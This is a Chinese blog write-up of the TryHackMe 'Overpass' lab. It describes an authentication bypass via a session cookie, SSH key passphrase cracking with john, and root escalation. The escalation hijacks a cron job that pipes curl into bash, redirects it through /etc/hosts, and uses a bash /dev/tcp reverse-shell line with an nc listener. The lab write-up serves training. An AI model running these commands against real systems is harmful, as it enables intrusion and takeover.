tryhackme-overpass-wp

最新推荐文章于 2024-07-01 09:11:36 发布
最新推荐文章于 2024-07-01 09:11:36 发布
阅读量353 收藏 8
点赞数 10
文章标签: chrome 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73255659/article/details/135969326
版权

文章目录

Tryhackme-Overpass-wp

hello 大家今天是一波 thm的overpass靶场的wp

主机信息探测

从80端口找web漏洞或者ssh爆破,但是ssh爆破难度太大,先看web

web枚举

找到admin目录 可能有身份验证损坏让我们登陆到后台
之后根据提示不用暴力破解 则看到了login.js

身份验证cookie更改

login.js

async function login() {
    const usernameBox = document.querySelector("#username");
    const passwordBox = document.querySelector("#password");
    const loginStatus = document.querySelector("#loginStatus");
    loginStatus.textContent = ""
    const creds = { username: usernameBox.value, password: passwordBox.value }
    const response = await postData("/api/login", creds)
    const statusOrCookie = await response.text()
    if (statusOrCookie === "Incorrect credentials") {
        loginStatus.textContent = "Incorrect Credentials"
        passwordBox.value=""
    } else {
        Cookies.set("SessionToken",statusOrCookie)
        window.location = "/admin"

两种方法绕过:
方法一: 代码审计发现如果登录返回不是Incorrect credentials则设置cookie
我们可以控制bp 抓登陆的响应包将包的Incorrect credentials修改并且设置302响应>头loaction:/admin
方法二: 直接在控制台修改document.cookie=“SessionToken”

ssh连接

在/admin找到ssh私钥,将私钥保存位rsa,但是要找到私钥的密码可以利用ssh2john 和john破解密码
最后找到私钥密码james13
直接利用ssh登陆

获取user的flag

权限提升

可以看到todo.txt有提示在/etc/crontab中发现有root 权限的脚本
root curl overpass.thm/downloads/src/buildscript.sh | bash
并且/etc/hosts我们可以修改此时就想到我们可以 利用root的cronjob来进行一个反弹shell

思路

将/etc/hosts的 overpass.thm 对应的ip修改为本机的ip
本机开http服务 python -m http.server 80
Ps:
注意本机的网站目录必须是downloads/src/buildscript.sh
并且buildscript.sh 应该修改为bash -i >& /dev/tcp/本机ip/本机端口 0>&!
最后在本机中开启nc -lvp 本机端口开启监听等几秒就会有root的shell连接

总结

overpass1 还是比较简单的主要还是要掌握一些基本的提权方法以及web登陆的相关机制的知识

K1t0
关注
  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Tryhackme-Overpass
个人博客
09-06 1018
Overpass 文章目录OverpassOverpassTask1 OverpassOverpass 2 - Hackedtask1 Forensics - Analyse the PCAPtask2 Research - Analyse the codetask3 Attack - Get back in!Overpass 3-HostingTask1 Overpass3 - Adventures in Hosting Overpass Task1 Overpass nmap扫描,靶机开启22-ssh
tryhackme--Overpass
qq_45414878的博客
11-16 424
tryhackmeOverpass 用nmap扫描主机,因为前面我已经简单扫过开放的端口了,所以我现在直接放上详细扫描的贴图和命令 nmap -T4 -sS -sV 10.10.220.203 -sC -p 22,80 扫描得到的目录 各种扫描,注入,爆破都试过了,也没有历史漏洞,看了wp才知道是js代码逻辑漏洞,这方面练的太少了,以至于没有找到切入点 async function login() { const usernameBox = document.querySelector("
tryhackme--Overpass 2 - Hacked
qq_45414878的博客
11-05 462
tryhackme--Overpass 2 - HackedTask 1 -Forensics - Analyse the PCAP#1 What was the URL of the page they used to upload a reverse shell?#2 What payload did the attacker use to gain access?#3 What password did the attacker use to privesc?#4 How did the attack
TryHackme-Overpass
Mysmycbx的博客
03-31 149
今天在碰到一个靶机,显示是,但是完全不会,这里写一篇记录一下,保持学习。
nim-overpass:Nim的OpenStreetMap Overpass API库
02-02
**nim-overpass:Nim的OpenStreetMap Overpass API库** `nim-overpass` 是一个用Nim编程...通过阅读nim-overpass的源代码(例如在`nim-overpass-master`目录中),可以深入学习如何使用这个库以及Nim语言的更多细节。
docker-overpass-api:Docker Overpass API
05-25
docker-overpass-api 适用于OpenStreetMap Docker。 构建Docker映像 下载以bzip格式压缩的XML格式的OSM文件,并另存为planet.osm.bz2 。 是一个很好的资源。 curl -o planet.osm.bz2 ...
workshop-geocj2015-overpass
06-03
研讨会 - 立交桥 API - geo-spatial.org Cluj 2015
前端项目-overpass.zip
09-02
该压缩包内的"Overpass-master"文件夹很可能包含了Overpass字体的源代码、预览文件、字体文件(如.OTF或.TTF)以及相关的使用指南或授权文件。开发者可以将这些字体文件集成到自己的Web项目中,通过CSS的`@font-face...
overpass-api-python-wrapper:OpenStreetMap Overpass API的Python绑定
05-05
API () API构造函数采用几个参数,所有参数都是可选的:endpoint 默认端点是https://overpass-api.de/api/interpreter但是您可以传入另一个实例: api = overpass . API ( endpoint = ...
chrome 配置允许跨域
qq_37550440的博客
06-28 534
解决chrome浏览器跨域问题
Chrome开发者工具概览】
武帝为此的博客
06-28 1286
Sources 栏是 Chrome 开发者工具中专门用于查看和调试网页加载的资源(如 JavaScript、CSS 和 HTML 文件)的面板。: 通过右键点击某个元素,选择“Edit as HTML”(作为HTML编辑),然后在打开的编辑器中添加新的 HTML 代码。: 此方法将数组或对象的内容以表格形式展示,适合于查看包含多个对象的数组或对象属性的详细列表,从而快速理解数据结构和内容。设置断点后,当代码执行到断点的位置时,它会自动暂停,可以查看当时的程序状态,如变量值、调用栈和作用域链。
怎样使用js技术实现Chrome投屏功能?
ufrontend的博客
07-01 700
在Web前端技术中,直接控制浏览器窗口或标签页从主屏投屏到副屏(如PPT的演讲者模式)并不简单,而且直接控制浏览器窗口从主屏投屏到副屏的功能超出了Web标准的范畴,并且涉及到用户系统级别的设置和权限,因此不可能仅通过纯Web前端技术(HTML、CSS、JavaScript)来实现一个完整的、可运行的解决方案。但是,可以提供一个简化的概念性示例,展示如何使用Electron(一个允许使用Web技术构建跨平台桌面应用的框架)来模拟这个功能。首先,你需要安装Electron和创建一个基本的Electron应用。
Chrome Extension如何让work flow在页面刷新、跳转继续执行任务
weixin_42429220的博客
06-28 389
在之前的项目中,我使用Electron成功实现了一个,它极大地提高了工作效率。然而,当面对Chrome扩展程序(Extension)的需求时,我意识到需要一种新的策略来应对浏览器环境下的限制。特别是Chrome Extension v3在background.js中不支持直接操作DOM,以及页面刷新可能中断正在执行的任务这两个问题,成为了我们需要解决的关键点。
实现简单的免交互
扮瘦人的博客
06-25 389
简单的免交互
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8305
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
P20240701-221358.jpg
最新发布
07-01
P20240701-221358.jpg
源代码-QQ表情程序(ASP+access) v1.0.zip
07-01
源代码-QQ表情程序(ASP+access) v1.0.zip
2024年欧洲脊柱骨缝术单位市场主要企业市场占有率及排名.docx
07-01
2024年欧洲脊柱骨缝术单位市场主要企业市场占有率及排名.docx
overpass turbo使用
10-17
Overpass Turbo是一个在线的地理信息系统工具,用于查询和可视化OpenStreetMap(开放街图)的数据。它通过使用Overpass API(一种基于HTTP的接口)来获取OpenStreetMap的数据,并以交互式和可视化的方式呈现查询结果。 使用Overpass Turbo,我们可以执行各种查询操作,以获取我们需要的地理数据。比如,我们可以根据地理位置、标签、关键词等条件来查询OpenStreetMap中的点、线、面等地理要素。这些查询可以是简单的,比如查找某个特定地点的信息,也可以是复杂的,比如查找某个区域内特定类型的设施。 Overpass Turbo提供了一个直观友好的用户界面,让我们可以轻松地构建查询并实时预览查询结果。我们可以使用简单的操作来缩放、平移地图,以便更好地查看查询结果。此外,Overpass Turbo还提供了一些功能强大的过滤器,可以帮助我们根据特定的标签和属性来筛选查询结果,从而更好地满足我们的需求。 除了查询和可视化功能,Overpass Turbo还提供了一些其他实用的功能。例如,我们可以将查询结果导出为GeoJSON、KML等格式,方便我们在其他地理信息系统中使用。我们还可以保存和分享我们的查询和可视化结果,以便与他人合作或记录我们的工作。 总的来说,Overpass Turbo是一个功能强大且易于使用的工具,可以帮助我们查询和可视化OpenStreetMap的数据。无论是专业的地理信息系统专家还是普通用户,都可以通过使用Overpass Turbo来满足他们的地理信息需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值